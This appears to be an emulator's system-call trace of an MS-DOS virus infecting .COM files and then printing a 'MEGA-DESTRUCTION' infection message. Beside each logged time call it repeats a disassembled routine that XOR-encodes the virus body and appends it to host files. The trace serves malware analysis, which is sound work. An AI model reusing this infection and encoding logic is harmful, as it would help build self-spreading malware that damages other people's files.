.
| Time |
Syscall Op |
Syscall Name |
| 2018-12-17T23:09:22.419300666Z | 26 | PC: 12a73 | Set disk transfer address |
| 2018-12-17T23:09:22.42146399Z | 37 | PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') |
| 2018-12-17T23:09:22.423108931Z | 37 | PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') |
| 2018-12-17T23:09:22.424613832Z | 78 | PC: 12ad1 | Find first file |
| 2018-12-17T23:09:22.429813962Z | 61 | PC: 12bce | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T23:09:22.433797996Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.438088963Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.439558929Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.440741776Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.442574193Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.444149852Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.446178009Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.45730714Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.462480752Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.464708813Z | 61 | PC: 12bce | Open file (Filename = 'PRINT.COM') |
| 2018-12-17T23:09:22.469279465Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.475422596Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.477742134Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.479447668Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.482371895Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.484742924Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x42
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.487239093Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.507048935Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.520064838Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.522593449Z | 61 | PC: 12bce | Open file (Filename = 'HELLO.COM') |
| 2018-12-17T23:09:22.528806456Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.536132261Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.537770767Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.539253015Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.543044187Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.545202907Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x42
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.548497Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.557006171Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.57412844Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.576500889Z | 61 | PC: 12bce | Open file (Filename = 'PHANG.COM') |
| 2018-12-17T23:09:22.583204433Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.589683185Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.590961941Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.592255743Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.594960113Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.596327417Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x48
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.598574643Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.606785571Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.614663361Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.617170323Z | 61 | PC: 12bce | Open file (Filename = 'PRINTA~1.COM') |
| 2018-12-17T23:09:22.624133468Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.630757807Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.632398283Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.634924788Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.637429328Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.638753041Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x4d
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.641370115Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.649398144Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.657893977Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.661983404Z | 61 | PC: 12bce | Open file (Filename = 'MANDEL.COM') |
| 2018-12-17T23:09:22.668230349Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.674280249Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.676768393Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.678017468Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.680470899Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.68363414Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x4d
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.686110885Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.69417134Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.703051809Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.705528598Z | 61 | PC: 12bce | Open file (Filename = 'PAH.COM') |
| 2018-12-17T23:09:22.711784016Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.719319657Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T23:09:22.72156817Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T23:09:22.723386448Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T23:09:22.727209838Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T23:09:22.729298667Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x2fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 0x106]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x120]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x53
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T23:09:22.732005239Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T23:09:22.741153718Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.749433607Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.751901647Z | 61 | PC: 12bce | Open file (Filename = 'TEST.COM') |
| 2018-12-17T23:09:22.758399675Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T23:09:22.761308685Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T23:09:22.762975147Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T23:09:22.765816808Z | 59 | PC: 12ae2 | Change current directory |
| 2018-12-17T23:09:22.770137975Z | 26 | PC: 12aeb | Set disk transfer address |
| 2018-12-17T23:09:22.771064926Z | 9 | PC: 12afd | Display string (String= 'You computher is now infected with:
MEGA-DESTRUCTION�
The Conjurers....
') |
